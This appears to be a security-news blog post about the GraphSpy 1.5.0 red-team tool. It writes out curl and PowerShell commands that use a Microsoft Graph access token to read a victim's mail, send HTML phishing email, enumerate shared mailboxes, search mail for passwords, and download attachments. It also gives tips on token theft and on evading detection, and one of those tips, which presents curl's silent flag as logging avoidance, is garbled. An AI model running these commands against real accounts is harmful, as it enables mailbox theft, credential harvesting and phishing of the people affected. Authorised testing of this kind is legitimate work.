Listen to this Post
GraphSpy 1.5.0 introduces a powerful new Outlook Graph module, enabling security professionals to leverage Microsoft Graph access tokens for advanced email operations during penetration testing.
🔗 Download/Info: GraphSpy GitHub
You Should Know:
1. Listing & Reading Emails
Use a Microsoft Graph access token to fetch emails directly from a target mailbox.
Example using curl with Graph API curl -H "Authorization: Bearer <ACCESS_TOKEN>" \ "https://graph.microsoft.com/v1.0/me/messages"
2. Sending HTML-Formatted Emails
GraphSpy now allows sending phishing or test emails via Microsoft Graph.
Send email via Graph API
curl -X POST -H "Authorization: Bearer <ACCESS_TOKEN>" \
-H "Content-Type: application/json" \
-d '{"message":{"subject":"Test","body":{"contentType":"HTML","content":"
<h1>Test Email</h1>
"},"toRecipients":[{"emailAddress":{"address":"[email protected]"}}]}}' \
"https://graph.microsoft.com/v1.0/me/sendMail"
3. Accessing Shared Mailboxes
Exploit shared mailbox permissions for lateral movement.
List shared mailboxes curl -H "Authorization: Bearer <ACCESS_TOKEN>" \ "https://graph.microsoft.com/v1.0/users/<user_id>/mailFolders"
4. Searching for Sensitive Data
Use custom queries to hunt for passwords or confidential data.
PowerShell Graph query for sensitive keywords
$query = "subject:'password' OR body:'credentials'"
Invoke-RestMethod -Uri "https://graph.microsoft.com/v1.0/me/messages?`$search=`"$query`"" -Headers @{Authorization="Bearer <ACCESS_TOKEN>"}
5. Extracting Attachments
Download email attachments for further analysis.
Get attachment IDs curl -H "Authorization: Bearer <ACCESS_TOKEN>" \ "https://graph.microsoft.com/v1.0/me/messages/<message_id>/attachments" Download attachment curl -H "Authorization: Bearer <ACCESS_TOKEN>" \ "https://graph.microsoft.com/v1.0/me/messages/<message_id>/attachments/<attachment_id>/\$value" --output file.txt
What Undercode Say
GraphSpy 1.5.0 enhances red teaming capabilities by integrating Microsoft Graph API exploitation into a single tool. Key takeaways:
– Token Abuse: Steal or forge Graph tokens to access emails.
– Lateral Movement: Use shared mailboxes to escalate access.
– Data Exfiltration: Extract sensitive emails and attachments.
– Phishing: Send realistic HTML emails for social engineering.
Relevant Commands & Tools
- Linux: `jq` for parsing JSON responses (
curl ... | jq .) - Windows: `Invoke-WebRequest` for Graph API interactions
- OAuth Exploitation: Use `mitm6` + `ntlmrelayx` for token theft
- Logging Avoidance: `–silent` flag in `curl` to minimize detection
Expected Output:
A successful GraphSpy execution should return:
- Email metadata (subjects, senders, dates)
- Extracted attachments (PDFs, documents)
- Confirmation of sent phishing emails
- Shared mailbox access proofs
For advanced exploitation, always test in controlled environments before real engagements.
🔗 Explore More: Microsoft Graph API Docs
References:
Reported By: Keanunys Graphspy – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
